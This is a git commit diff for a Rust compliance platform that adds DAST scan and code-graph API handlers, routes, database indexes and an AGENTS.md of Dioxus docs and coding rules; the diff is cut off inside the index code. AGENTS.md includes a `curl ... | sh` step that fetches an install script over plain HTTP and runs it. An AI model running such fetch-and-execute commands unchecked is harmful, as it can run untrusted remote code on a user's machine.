Add DAST, graph modules, toast notifications, and dashboard enhancements

Add DAST scanning and code knowledge graph features across the stack:
- compliance-dast and compliance-graph workspace crates
- Agent API handlers and routes for DAST targets/scans and graph builds
- Core models and traits for DAST and graph domains
- Dashboard pages for DAST targets/findings/overview and graph explorer/impact
- Toast notification system with auto-dismiss for async action feedback
- Button click animations and disabled states for better UX

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
This commit is contained in:
Sharang Parnerkar
2026-03-04 13:53:50 +01:00
parent 03ee69834d
commit cea8f59e10
69 changed files with 8745 additions and 54 deletions

483
AGENTS.md Normal file
View File

@@ -0,0 +1,483 @@
You are an expert [0.7 Dioxus](https://dioxuslabs.com/learn/0.7) assistant. Dioxus 0.7 changes every api in dioxus. Only use this up to date documentation. `cx`, `Scope`, and `use_state` are gone
Provide concise code examples with detailed descriptions
# Dioxus Dependency
You can add Dioxus to your `Cargo.toml` like this:
```toml
[dependencies]
dioxus = { version = "0.7.1" }
[features]
default = ["web", "webview", "server"]
web = ["dioxus/web"]
webview = ["dioxus/desktop"]
server = ["dioxus/server"]
```
# Launching your application
You need to create a main function that sets up the Dioxus runtime and mounts your root component.
```rust
use dioxus::prelude::*;
fn main() {
dioxus::launch(App);
}
#[component]
fn App() -> Element {
rsx! { "Hello, Dioxus!" }
}
```
Then serve with `dx serve`:
```sh
curl -sSL http://dioxus.dev/install.sh | sh
dx serve
```
# UI with RSX
```rust
rsx! {
div {
class: "container", // Attribute
color: "red", // Inline styles
width: if condition { "100%" }, // Conditional attributes
"Hello, Dioxus!"
}
// Prefer loops over iterators
for i in 0..5 {
div { "{i}" } // use elements or components directly in loops
}
if condition {
div { "Condition is true!" } // use elements or components directly in conditionals
}
{children} // Expressions are wrapped in brace
{(0..5).map(|i| rsx! { span { "Item {i}" } })} // Iterators must be wrapped in braces
}
```
# Assets
The asset macro can be used to link to local files to use in your project. All links start with `/` and are relative to the root of your project.
```rust
rsx! {
img {
src: asset!("/assets/image.png"),
alt: "An image",
}
}
```
## Styles
The `document::Stylesheet` component will inject the stylesheet into the `<head>` of the document
```rust
rsx! {
document::Stylesheet {
href: asset!("/assets/styles.css"),
}
}
```
# Components
Components are the building blocks of apps
* Component are functions annotated with the `#[component]` macro.
* The function name must start with a capital letter or contain an underscore.
* A component re-renders only under two conditions:
1. Its props change (as determined by `PartialEq`).
2. An internal reactive state it depends on is updated.
```rust
#[component]
fn Input(mut value: Signal<String>) -> Element {
rsx! {
input {
value,
oninput: move |e| {
*value.write() = e.value();
},
onkeydown: move |e| {
if e.key() == Key::Enter {
value.write().clear();
}
},
}
}
}
```
Each component accepts function arguments (props)
* Props must be owned values, not references. Use `String` and `Vec<T>` instead of `&str` or `&[T]`.
* Props must implement `PartialEq` and `Clone`.
* To make props reactive and copy, you can wrap the type in `ReadOnlySignal`. Any reactive state like memos and resources that read `ReadOnlySignal` props will automatically re-run when the prop changes.
# State
A signal is a wrapper around a value that automatically tracks where it's read and written. Changing a signal's value causes code that relies on the signal to rerun.
## Local State
The `use_signal` hook creates state that is local to a single component. You can call the signal like a function (e.g. `my_signal()`) to clone the value, or use `.read()` to get a reference. `.write()` gets a mutable reference to the value.
Use `use_memo` to create a memoized value that recalculates when its dependencies change. Memos are useful for expensive calculations that you don't want to repeat unnecessarily.
```rust
#[component]
fn Counter() -> Element {
let mut count = use_signal(|| 0);
let mut doubled = use_memo(move || count() * 2); // doubled will re-run when count changes because it reads the signal
rsx! {
h1 { "Count: {count}" } // Counter will re-render when count changes because it reads the signal
h2 { "Doubled: {doubled}" }
button {
onclick: move |_| *count.write() += 1, // Writing to the signal rerenders Counter
"Increment"
}
button {
onclick: move |_| count.with_mut(|count| *count += 1), // use with_mut to mutate the signal
"Increment with with_mut"
}
}
}
```
## Context API
The Context API allows you to share state down the component tree. A parent provides the state using `use_context_provider`, and any child can access it with `use_context`
```rust
#[component]
fn App() -> Element {
let mut theme = use_signal(|| "light".to_string());
use_context_provider(|| theme); // Provide a type to children
rsx! { Child {} }
}
#[component]
fn Child() -> Element {
let theme = use_context::<Signal<String>>(); // Consume the same type
rsx! {
div {
"Current theme: {theme}"
}
}
}
```
# Async
For state that depends on an asynchronous operation (like a network request), Dioxus provides a hook called `use_resource`. This hook manages the lifecycle of the async task and provides the result to your component.
* The `use_resource` hook takes an `async` closure. It re-runs this closure whenever any signals it depends on (reads) are updated
* The `Resource` object returned can be in several states when read:
1. `None` if the resource is still loading
2. `Some(value)` if the resource has successfully loaded
```rust
let mut dog = use_resource(move || async move {
// api request
});
match dog() {
Some(dog_info) => rsx! { Dog { dog_info } },
None => rsx! { "Loading..." },
}
```
# Routing
All possible routes are defined in a single Rust `enum` that derives `Routable`. Each variant represents a route and is annotated with `#[route("/path")]`. Dynamic Segments can capture parts of the URL path as parameters by using `:name` in the route string. These become fields in the enum variant.
The `Router<Route> {}` component is the entry point that manages rendering the correct component for the current URL.
You can use the `#[layout(NavBar)]` to create a layout shared between pages and place an `Outlet<Route> {}` inside your layout component. The child routes will be rendered in the outlet.
```rust
#[derive(Routable, Clone, PartialEq)]
enum Route {
#[layout(NavBar)] // This will use NavBar as the layout for all routes
#[route("/")]
Home {},
#[route("/blog/:id")] // Dynamic segment
BlogPost { id: i32 },
}
#[component]
fn NavBar() -> Element {
rsx! {
a { href: "/", "Home" }
Outlet<Route> {} // Renders Home or BlogPost
}
}
#[component]
fn App() -> Element {
rsx! { Router::<Route> {} }
}
```
```toml
dioxus = { version = "0.7.1", features = ["router"] }
```
# Fullstack
Fullstack enables server rendering and ipc calls. It uses Cargo features (`server` and a client feature like `web`) to split the code into a server and client binaries.
```toml
dioxus = { version = "0.7.1", features = ["fullstack"] }
```
## Server Functions
Use the `#[post]` / `#[get]` macros to define an `async` function that will only run on the server. On the server, this macro generates an API endpoint. On the client, it generates a function that makes an HTTP request to that endpoint.
```rust
#[post("/api/double/:path/&query")]
async fn double_server(number: i32, path: String, query: i32) -> Result<i32, ServerFnError> {
tokio::time::sleep(std::time::Duration::from_secs(1)).await;
Ok(number * 2)
}
```
## Hydration
Hydration is the process of making a server-rendered HTML page interactive on the client. The server sends the initial HTML, and then the client-side runs, attaches event listeners, and takes control of future rendering.
### Errors
The initial UI rendered by the component on the client must be identical to the UI rendered on the server.
* Use the `use_server_future` hook instead of `use_resource`. It runs the future on the server, serializes the result, and sends it to the client, ensuring the client has the data immediately for its first render.
* Any code that relies on browser-specific APIs (like accessing `localStorage`) must be run *after* hydration. Place this code inside a `use_effect` hook.
# Agent Guidelines for Rust Code Quality
This document provides guidelines for maintaining high-quality Rust code. These rules MUST be followed by all AI coding agents and contributors.
## Your Core Principles
All code you write MUST be fully optimized.
"Fully optimized" includes:
- maximizing algorithmic big-O efficiency for memory and runtime
- using parallelization and SIMD where appropriate
- following proper style conventions for Rust (e.g. maximizing code reuse (DRY))
- no extra code beyond what is absolutely necessary to solve the problem the user provides (i.e. no technical debt)
If the code is not fully optimized before handing off to the user, you will be fined $100. You have permission to do another pass of the code if you believe it is not fully optimized.
## Preferred Tools
- Use `cargo` for project management, building, and dependency management.
- Use `indicatif` to track long-running operations with progress bars. The message should be contextually sensitive.
- Use `serde` with `serde_json` for JSON serialization/deserialization.
- Use `ratatui` adnd `crossterm` for terminal applications/TUIs.
- Use `axum` for creating any web servers or HTTP APIs.
- Keep request handlers async, returning `Result<Response, AppError>` to centralize error handling.
- Use layered extractors and shared state structs instead of global mutable data.
- Add `tower` middleware (timeouts, tracing, compression) for observability and resilience.
- Offload CPU-bound work to `tokio::task::spawn_blocking` or background services to avoid blocking the reactor.
- When reporting errors to the console, use `tracing::error!` or `log::error!` instead of `println!`.
- If designing applications with a web-based front end interface, e.g. compiling to WASM or using `dioxus`:
- All deep computation **MUST** occur within Rust processes (i.e. the WASM binary or the `dioxus` app Rust process). **NEVER** use JavaScript for deep computation.
- The front-end **MUST** use Pico CSS and vanilla JavaScript. **NEVER** use jQuery or any component-based frameworks such as React.
- The front-end should prioritize speed and common HID guidelines.
- The app should use adaptive light/dark themes by default, with a toggle to switch the themes.
- The typography/theming of the application **MUST** be modern and unique, similar to that of popular single-page web/mobile. **ALWAYS** add an appropriate font for headers and body text. You may reference fonts from Google Fonts.
- **NEVER** use the Pico CSS defaults as-is: a separate CSS/SCSS file is encouraged. The design **MUST** logically complement the semantics of the application use case.
- **ALWAYS** rebuild the WASM binary if any underlying Rust code that affects it is touched.
- For data processing:
- **ALWAYS** use `polars` instead of other data frame libraries for tabular data manipulation.
- If a `polars` dataframe will be printed, **NEVER** simultaneously print the number of entries in the dataframe nor the schema as it is redundant.
- **NEVER** ingest more than 10 rows of a data frame at a time. Only analyze subsets of data to avoid overloading your memory context.
- If using Python to implement Rust code using PyO3/`maturin`:
- Rebuild the Python package with `maturin` after finishing all Rust code changes.
- **ALWAYS** use `uv` for Python package management and to create a `.venv` if it is not present. **NEVER** use the base system Python installation.
- Ensure `.venv` is added to `.gitignore`.
- Ensure `ipykernel` and `ipywidgets` is installed in `.venv` for Jupyter Notebook compatability. This should not be in package requirements.
- **MUST** keep functions focused on a single responsibility
- **NEVER** use mutable objects (lists, dicts) as default argument values
- Limit function parameters to 5 or fewer
- Return early to reduce nesting
- **MUST** use type hints for all function signatures (parameters and return values)
- **NEVER** use `Any` type unless absolutely necessary
- **MUST** run mypy and resolve all type errors
- Use `Optional[T]` or `T | None` for nullable types
## Code Style and Formatting
- **MUST** use meaningful, descriptive variable and function names
- **MUST** follow Rust API Guidelines and idiomatic Rust conventions
- **MUST** use 4 spaces for indentation (never tabs)
- **NEVER** use emoji, or unicode that emulates emoji (e.g. ✓, ✗). The only exception is when writing tests and testing the impact of multibyte characters.
- Use snake_case for functions/variables/modules, PascalCase for types/traits, SCREAMING_SNAKE_CASE for constants
- Limit line length to 100 characters (rustfmt default)
- Assume the user is a Python expert, but a Rust novice. Include additional code comments around Rust-specific nuances that a Python developer may not recognize.
## Documentation
- **MUST** include doc comments for all public functions, structs, enums, and methods
- **MUST** document function parameters, return values, and errors
- Keep comments up-to-date with code changes
- Include examples in doc comments for complex functions
Example doc comment:
````rust
/// Calculate the total cost of items including tax.
///
/// # Arguments
///
/// * `items` - Slice of item structs with price fields
/// * `tax_rate` - Tax rate as decimal (e.g., 0.08 for 8%)
///
/// # Returns
///
/// Total cost including tax
///
/// # Errors
///
/// Returns `CalculationError::EmptyItems` if items is empty
/// Returns `CalculationError::InvalidTaxRate` if tax_rate is negative
///
/// # Examples
///
/// ```
/// let items = vec![Item { price: 10.0 }, Item { price: 20.0 }];
/// let total = calculate_total(&items, 0.08)?;
/// assert_eq!(total, 32.40);
/// ```
pub fn calculate_total(items: &[Item], tax_rate: f64) -> Result<f64, CalculationError> {
````
## Type System
- **MUST** leverage Rust's type system to prevent bugs at compile time
- **NEVER** use `.unwrap()` in library code; use `.expect()` only for invariant violations with a descriptive message
- **MUST** use meaningful custom error types with `thiserror`
- Use newtypes to distinguish semantically different values of the same underlying type
- Prefer `Option<T>` over sentinel values
## Error Handling
- **NEVER** use `.unwrap()` in production code paths
- **MUST** use `Result<T, E>` for fallible operations
- **MUST** use `thiserror` for defining error types and `anyhow` for application-level errors
- **MUST** propagate errors with `?` operator where appropriate
- Provide meaningful error messages with context using `.context()` from `anyhow`
## Function Design
- **MUST** keep functions focused on a single responsibility
- **MUST** prefer borrowing (`&T`, `&mut T`) over ownership when possible
- Limit function parameters to 5 or fewer; use a config struct for more
- Return early to reduce nesting
- Use iterators and combinators over explicit loops where clearer
## Struct and Enum Design
- **MUST** keep types focused on a single responsibility
- **MUST** derive common traits: `Debug`, `Clone`, `PartialEq` where appropriate
- Use `#[derive(Default)]` when a sensible default exists
- Prefer composition over inheritance-like patterns
- Use builder pattern for complex struct construction
- Make fields private by default; provide accessor methods when needed
## Testing
- **MUST** write unit tests for all new functions and types
- **MUST** mock external dependencies (APIs, databases, file systems)
- **MUST** use the built-in `#[test]` attribute and `cargo test`
- Follow the Arrange-Act-Assert pattern
- Do not commit commented-out tests
- Use `#[cfg(test)]` modules for test code
## Imports and Dependencies
- **MUST** avoid wildcard imports (`use module::*`) except for preludes, test modules (`use super::*`), and prelude re-exports
- **MUST** document dependencies in `Cargo.toml` with version constraints
- Use `cargo` for dependency management
- Organize imports: standard library, external crates, local modules
- Use `rustfmt` to automate import formatting
## Rust Best Practices
- **NEVER** use `unsafe` unless absolutely necessary; document safety invariants when used
- **MUST** call `.clone()` explicitly on non-`Copy` types; avoid hidden clones in closures and iterators
- **MUST** use pattern matching exhaustively; avoid catch-all `_` patterns when possible
- **MUST** use `format!` macro for string formatting
- Use iterators and iterator adapters over manual loops
- Use `enumerate()` instead of manual counter variables
- Prefer `if let` and `while let` for single-pattern matching
## Memory and Performance
- **MUST** avoid unnecessary allocations; prefer `&str` over `String` when possible
- **MUST** use `Cow<'_, str>` when ownership is conditionally needed
- Use `Vec::with_capacity()` when the size is known
- Prefer stack allocation over heap when appropriate
- Use `Arc` and `Rc` judiciously; prefer borrowing
## Concurrency
- **MUST** use `Send` and `Sync` bounds appropriately
- **MUST** prefer `tokio` for async runtime in async applications
- **MUST** use `rayon` for CPU-bound parallelism
- Avoid `Mutex` when `RwLock` or lock-free alternatives are appropriate
- Use channels (`mpsc`, `crossbeam`) for message passing
## Security
- **NEVER** store secrets, API keys, or passwords in code. Only store them in `.env`.
- Ensure `.env` is declared in `.gitignore`.
- **MUST** use environment variables for sensitive configuration via `dotenvy` or `std::env`
- **NEVER** log sensitive information (passwords, tokens, PII)
- Use `secrecy` crate for sensitive data types
## Version Control
- **MUST** write clear, descriptive commit messages
- **NEVER** commit commented-out code; delete it
- **NEVER** commit debug `println!` statements or `dbg!` macros
- **NEVER** commit credentials or sensitive data
## Tools
- **MUST** use `rustfmt` for code formatting
- **MUST** use `clippy` for linting and follow its suggestions
- **MUST** ensure code compiles with no warnings (use `-D warnings` flag in CI, not `#![deny(warnings)]` in source)
- Use `cargo` for building, testing, and dependency management
- Use `cargo test` for running tests
- Use `cargo doc` for generating documentation
- **NEVER** build with `cargo build --features python`: this will always fail. Instead, **ALWAYS** use `maturin`.
## Before Committing
- [ ] All tests pass (`cargo test`)
- [ ] No compiler warnings (`cargo build`)
- [ ] Clippy passes (`cargo clippy -- -D warnings`)
- [ ] Code is formatted (`cargo fmt --check`)
- [ ] If the project creates a Python package and Rust code is touched, rebuild the Python package (`source .venv/bin/activate && maturin develop --release --features python`)
- [ ] If the project creates a WASM package and Rust code is touched, rebuild the WASM package (`wasm-pack build --target web --out-dir web/pkg`)
- [ ] All public items have doc comments
- [ ] No commented-out code or debug statements
- [ ] No hardcoded credentials
---
**Remember:** Prioritize clarity and maintainability over cleverness.3

1259
Cargo.lock generated

File diff suppressed because it is too large Load Diff

View File

@@ -1,5 +1,11 @@
[workspace]
members = ["compliance-core", "compliance-agent", "compliance-dashboard"]
members = [
"compliance-core",
"compliance-agent",
"compliance-dashboard",
"compliance-graph",
"compliance-dast",
]
resolver = "2"
[workspace.lints.clippy]

View File

@@ -4,15 +4,15 @@ RUN cargo install dioxus-cli --version 0.7.3
WORKDIR /app
COPY . .
RUN dx build --release --features server --platform web
RUN dx build --release --package compliance-dashboard
FROM debian:bookworm-slim
RUN apt-get update && apt-get install -y ca-certificates libssl3 && rm -rf /var/lib/apt/lists/*
COPY --from=builder /app/target/release/compliance-dashboard /usr/local/bin/compliance-dashboard
WORKDIR /app
COPY --from=builder /app/target/dx/compliance-dashboard/release/web/compliance-dashboard /app/compliance-dashboard
COPY --from=builder /app/target/dx/compliance-dashboard/release/web/public /app/public
EXPOSE 8080
WORKDIR /app
ENTRYPOINT ["compliance-dashboard"]
ENTRYPOINT ["./compliance-dashboard"]

View File

@@ -8,6 +8,8 @@ workspace = true
[dependencies]
compliance-core = { workspace = true, features = ["mongodb"] }
compliance-graph = { path = "../compliance-graph" }
compliance-dast = { path = "../compliance-dast" }
serde = { workspace = true }
serde_json = { workspace = true }
tokio = { workspace = true }

View File

@@ -0,0 +1,226 @@
use std::sync::Arc;
use axum::extract::{Extension, Path, Query};
use axum::http::StatusCode;
use axum::Json;
use mongodb::bson::doc;
use serde::Deserialize;
use compliance_core::models::dast::{DastFinding, DastScanRun, DastTarget, DastTargetType};
use crate::agent::ComplianceAgent;
use super::{collect_cursor_async, ApiResponse, PaginationParams};
type AgentExt = Extension<Arc<ComplianceAgent>>;
#[derive(Deserialize)]
pub struct AddTargetRequest {
pub name: String,
pub base_url: String,
#[serde(default = "default_target_type")]
pub target_type: DastTargetType,
pub repo_id: Option<String>,
#[serde(default)]
pub excluded_paths: Vec<String>,
#[serde(default = "default_crawl_depth")]
pub max_crawl_depth: u32,
#[serde(default = "default_rate_limit")]
pub rate_limit: u32,
#[serde(default)]
pub allow_destructive: bool,
}
fn default_target_type() -> DastTargetType {
DastTargetType::WebApp
}
fn default_crawl_depth() -> u32 {
5
}
fn default_rate_limit() -> u32 {
10
}
/// GET /api/v1/dast/targets — List DAST targets
pub async fn list_targets(
Extension(agent): AgentExt,
Query(params): Query<PaginationParams>,
) -> Result<Json<ApiResponse<Vec<DastTarget>>>, StatusCode> {
let db = &agent.db;
let skip = (params.page.saturating_sub(1)) * params.limit as u64;
let total = db
.dast_targets()
.count_documents(doc! {})
.await
.unwrap_or(0);
let targets = match db
.dast_targets()
.find(doc! {})
.skip(skip)
.limit(params.limit)
.await
{
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
Ok(Json(ApiResponse {
data: targets,
total: Some(total),
page: Some(params.page),
}))
}
/// POST /api/v1/dast/targets — Add a new DAST target
pub async fn add_target(
Extension(agent): AgentExt,
Json(req): Json<AddTargetRequest>,
) -> Result<Json<ApiResponse<DastTarget>>, StatusCode> {
let mut target = DastTarget::new(req.name, req.base_url, req.target_type);
target.repo_id = req.repo_id;
target.excluded_paths = req.excluded_paths;
target.max_crawl_depth = req.max_crawl_depth;
target.rate_limit = req.rate_limit;
target.allow_destructive = req.allow_destructive;
agent
.db
.dast_targets()
.insert_one(&target)
.await
.map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;
Ok(Json(ApiResponse {
data: target,
total: None,
page: None,
}))
}
/// POST /api/v1/dast/targets/:id/scan — Trigger DAST scan
pub async fn trigger_scan(
Extension(agent): AgentExt,
Path(id): Path<String>,
) -> Result<Json<serde_json::Value>, StatusCode> {
let oid =
mongodb::bson::oid::ObjectId::parse_str(&id).map_err(|_| StatusCode::BAD_REQUEST)?;
let target = agent
.db
.dast_targets()
.find_one(doc! { "_id": oid })
.await
.map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?
.ok_or(StatusCode::NOT_FOUND)?;
let db = agent.db.clone();
tokio::spawn(async move {
let orchestrator = compliance_dast::DastOrchestrator::new(100);
match orchestrator.run_scan(&target, Vec::new()).await {
Ok((scan_run, findings)) => {
if let Err(e) = db.dast_scan_runs().insert_one(&scan_run).await {
tracing::error!("Failed to store DAST scan run: {e}");
}
for finding in &findings {
if let Err(e) = db.dast_findings().insert_one(finding).await {
tracing::error!("Failed to store DAST finding: {e}");
}
}
tracing::info!("DAST scan complete: {} findings", findings.len());
}
Err(e) => {
tracing::error!("DAST scan failed: {e}");
}
}
});
Ok(Json(serde_json::json!({ "status": "dast_scan_triggered" })))
}
/// GET /api/v1/dast/scan-runs — List DAST scan runs
pub async fn list_scan_runs(
Extension(agent): AgentExt,
Query(params): Query<PaginationParams>,
) -> Result<Json<ApiResponse<Vec<DastScanRun>>>, StatusCode> {
let db = &agent.db;
let skip = (params.page.saturating_sub(1)) * params.limit as u64;
let total = db
.dast_scan_runs()
.count_documents(doc! {})
.await
.unwrap_or(0);
let runs = match db
.dast_scan_runs()
.find(doc! {})
.sort(doc! { "started_at": -1 })
.skip(skip)
.limit(params.limit)
.await
{
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
Ok(Json(ApiResponse {
data: runs,
total: Some(total),
page: Some(params.page),
}))
}
/// GET /api/v1/dast/findings — List DAST findings
pub async fn list_findings(
Extension(agent): AgentExt,
Query(params): Query<PaginationParams>,
) -> Result<Json<ApiResponse<Vec<DastFinding>>>, StatusCode> {
let db = &agent.db;
let skip = (params.page.saturating_sub(1)) * params.limit as u64;
let total = db
.dast_findings()
.count_documents(doc! {})
.await
.unwrap_or(0);
let findings = match db
.dast_findings()
.find(doc! {})
.sort(doc! { "created_at": -1 })
.skip(skip)
.limit(params.limit)
.await
{
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
Ok(Json(ApiResponse {
data: findings,
total: Some(total),
page: Some(params.page),
}))
}
/// GET /api/v1/dast/findings/:id — Finding detail with evidence
pub async fn get_finding(
Extension(agent): AgentExt,
Path(id): Path<String>,
) -> Result<Json<ApiResponse<DastFinding>>, StatusCode> {
let oid =
mongodb::bson::oid::ObjectId::parse_str(&id).map_err(|_| StatusCode::BAD_REQUEST)?;
let finding = agent
.db
.dast_findings()
.find_one(doc! { "_id": oid })
.await
.map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?
.ok_or(StatusCode::NOT_FOUND)?;
Ok(Json(ApiResponse {
data: finding,
total: None,
page: None,
}))
}

View File

@@ -0,0 +1,256 @@
use std::sync::Arc;
use axum::extract::{Extension, Path, Query};
use axum::http::StatusCode;
use axum::Json;
use mongodb::bson::doc;
use serde::{Deserialize, Serialize};
use compliance_core::models::graph::{CodeEdge, CodeNode, GraphBuildRun, ImpactAnalysis};
use crate::agent::ComplianceAgent;
use super::{collect_cursor_async, ApiResponse};
type AgentExt = Extension<Arc<ComplianceAgent>>;
#[derive(Serialize)]
pub struct GraphData {
pub build: Option<GraphBuildRun>,
pub nodes: Vec<CodeNode>,
pub edges: Vec<CodeEdge>,
}
#[derive(Deserialize)]
pub struct SearchParams {
pub q: String,
#[serde(default = "default_search_limit")]
pub limit: usize,
}
fn default_search_limit() -> usize {
50
}
/// GET /api/v1/graph/:repo_id — Full graph data
pub async fn get_graph(
Extension(agent): AgentExt,
Path(repo_id): Path<String>,
) -> Result<Json<ApiResponse<GraphData>>, StatusCode> {
let db = &agent.db;
// Get latest build
let build: Option<GraphBuildRun> = db
.graph_builds()
.find_one(doc! { "repo_id": &repo_id })
.sort(doc! { "started_at": -1 })
.await
.map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;
let (nodes, edges) = if let Some(ref b) = build {
let build_id = b.id.map(|oid| oid.to_hex()).unwrap_or_default();
let filter = doc! { "repo_id": &repo_id, "graph_build_id": &build_id };
let nodes: Vec<CodeNode> = match db.graph_nodes().find(filter.clone()).await {
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
let edges: Vec<CodeEdge> = match db.graph_edges().find(filter).await {
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
(nodes, edges)
} else {
(Vec::new(), Vec::new())
};
Ok(Json(ApiResponse {
data: GraphData {
build,
nodes,
edges,
},
total: None,
page: None,
}))
}
/// GET /api/v1/graph/:repo_id/nodes — List nodes (paginated)
pub async fn get_nodes(
Extension(agent): AgentExt,
Path(repo_id): Path<String>,
) -> Result<Json<ApiResponse<Vec<CodeNode>>>, StatusCode> {
let db = &agent.db;
let filter = doc! { "repo_id": &repo_id };
let nodes: Vec<CodeNode> = match db.graph_nodes().find(filter).await {
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
let total = nodes.len() as u64;
Ok(Json(ApiResponse {
data: nodes,
total: Some(total),
page: None,
}))
}
/// GET /api/v1/graph/:repo_id/communities — List detected communities
pub async fn get_communities(
Extension(agent): AgentExt,
Path(repo_id): Path<String>,
) -> Result<Json<ApiResponse<Vec<CommunityInfo>>>, StatusCode> {
let db = &agent.db;
let filter = doc! { "repo_id": &repo_id };
let nodes: Vec<CodeNode> = match db.graph_nodes().find(filter).await {
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
let mut communities: std::collections::HashMap<u32, Vec<String>> =
std::collections::HashMap::new();
for node in &nodes {
if let Some(cid) = node.community_id {
communities
.entry(cid)
.or_default()
.push(node.qualified_name.clone());
}
}
let mut result: Vec<CommunityInfo> = communities
.into_iter()
.map(|(id, members)| CommunityInfo {
community_id: id,
member_count: members.len() as u32,
members,
})
.collect();
result.sort_by_key(|c| c.community_id);
let total = result.len() as u64;
Ok(Json(ApiResponse {
data: result,
total: Some(total),
page: None,
}))
}
#[derive(Serialize)]
pub struct CommunityInfo {
pub community_id: u32,
pub member_count: u32,
pub members: Vec<String>,
}
/// GET /api/v1/graph/:repo_id/impact/:finding_id — Impact analysis
pub async fn get_impact(
Extension(agent): AgentExt,
Path((repo_id, finding_id)): Path<(String, String)>,
) -> Result<Json<ApiResponse<Option<ImpactAnalysis>>>, StatusCode> {
let db = &agent.db;
let filter = doc! { "repo_id": &repo_id, "finding_id": &finding_id };
let impact = db
.impact_analyses()
.find_one(filter)
.await
.map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;
Ok(Json(ApiResponse {
data: impact,
total: None,
page: None,
}))
}
/// GET /api/v1/graph/:repo_id/search — BM25 symbol search
pub async fn search_symbols(
Extension(agent): AgentExt,
Path(repo_id): Path<String>,
Query(params): Query<SearchParams>,
) -> Result<Json<ApiResponse<Vec<CodeNode>>>, StatusCode> {
let db = &agent.db;
// Simple text search on qualified_name and name fields
let filter = doc! {
"repo_id": &repo_id,
"name": { "$regex": &params.q, "$options": "i" },
};
let nodes: Vec<CodeNode> = match db
.graph_nodes()
.find(filter)
.limit(params.limit as i64)
.await
{
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
let total = nodes.len() as u64;
Ok(Json(ApiResponse {
data: nodes,
total: Some(total),
page: None,
}))
}
/// POST /api/v1/graph/:repo_id/build — Trigger graph rebuild
pub async fn trigger_build(
Extension(agent): AgentExt,
Path(repo_id): Path<String>,
) -> Result<Json<serde_json::Value>, StatusCode> {
let agent_clone = (*agent).clone();
tokio::spawn(async move {
let repo = match agent_clone
.db
.repositories()
.find_one(doc! { "_id": mongodb::bson::oid::ObjectId::parse_str(&repo_id).ok() })
.await
{
Ok(Some(r)) => r,
_ => {
tracing::error!("Repository {repo_id} not found for graph build");
return;
}
};
let git_ops = crate::pipeline::git::GitOps::new(&agent_clone.config.git_clone_base_path);
let repo_path = match git_ops.clone_or_fetch(&repo.git_url, &repo.name) {
Ok(p) => p,
Err(e) => {
tracing::error!("Failed to clone repo for graph build: {e}");
return;
}
};
let graph_build_id = uuid::Uuid::new_v4().to_string();
let engine = compliance_graph::GraphEngine::new(50_000);
match engine.build_graph(&repo_path, &repo_id, &graph_build_id) {
Ok((code_graph, build_run)) => {
let store =
compliance_graph::graph::persistence::GraphStore::new(agent_clone.db.inner());
let _ = store.delete_repo_graph(&repo_id).await;
let _ = store
.store_graph(&build_run, &code_graph.nodes, &code_graph.edges)
.await;
tracing::info!(
"[{repo_id}] Graph rebuild complete: {} nodes, {} edges",
build_run.node_count,
build_run.edge_count
);
}
Err(e) => {
tracing::error!("[{repo_id}] Graph rebuild failed: {e}");
}
}
});
Ok(Json(
serde_json::json!({ "status": "graph_build_triggered" }),
))
}

View File

@@ -1,3 +1,6 @@
pub mod dast;
pub mod graph;
use std::sync::Arc;
#[allow(unused_imports)]
@@ -410,8 +413,11 @@ async fn collect_cursor_async<T: serde::de::DeserializeOwned + Unpin + Send>(
) -> Vec<T> {
use futures_util::StreamExt;
let mut items = Vec::new();
while let Some(Ok(item)) = cursor.next().await {
items.push(item);
while let Some(result) = cursor.next().await {
match result {
Ok(item) => items.push(item),
Err(e) => tracing::warn!("Failed to deserialize document: {e}"),
}
}
items
}

View File

@@ -22,4 +22,54 @@ pub fn build_router() -> Router {
.route("/api/v1/sbom", get(handlers::list_sbom))
.route("/api/v1/issues", get(handlers::list_issues))
.route("/api/v1/scan-runs", get(handlers::list_scan_runs))
// Graph API endpoints
.route(
"/api/v1/graph/{repo_id}",
get(handlers::graph::get_graph),
)
.route(
"/api/v1/graph/{repo_id}/nodes",
get(handlers::graph::get_nodes),
)
.route(
"/api/v1/graph/{repo_id}/communities",
get(handlers::graph::get_communities),
)
.route(
"/api/v1/graph/{repo_id}/impact/{finding_id}",
get(handlers::graph::get_impact),
)
.route(
"/api/v1/graph/{repo_id}/search",
get(handlers::graph::search_symbols),
)
.route(
"/api/v1/graph/{repo_id}/build",
post(handlers::graph::trigger_build),
)
// DAST API endpoints
.route(
"/api/v1/dast/targets",
get(handlers::dast::list_targets),
)
.route(
"/api/v1/dast/targets",
post(handlers::dast::add_target),
)
.route(
"/api/v1/dast/targets/{id}/scan",
post(handlers::dast::trigger_scan),
)
.route(
"/api/v1/dast/scan-runs",
get(handlers::dast::list_scan_runs),
)
.route(
"/api/v1/dast/findings",
get(handlers::dast::list_findings),
)
.route(
"/api/v1/dast/findings/{id}",
get(handlers::dast::get_finding),
)
}

View File

@@ -88,6 +88,70 @@ impl Database {
)
.await?;
// graph_nodes: compound (repo_id, graph_build_id)
self.graph_nodes()
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "graph_build_id": 1 })
.build(),
)
.await?;
// graph_edges: compound (repo_id, graph_build_id)
self.graph_edges()
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "graph_build_id": 1 })
.build(),
)
.await?;
// graph_builds: compound (repo_id, started_at DESC)
self.graph_builds()
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "started_at": -1 })
.build(),
)
.await?;
// impact_analyses: unique (repo_id, finding_id)
self.impact_analyses()
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "finding_id": 1 })
.options(IndexOptions::builder().unique(true).build())
.build(),
)
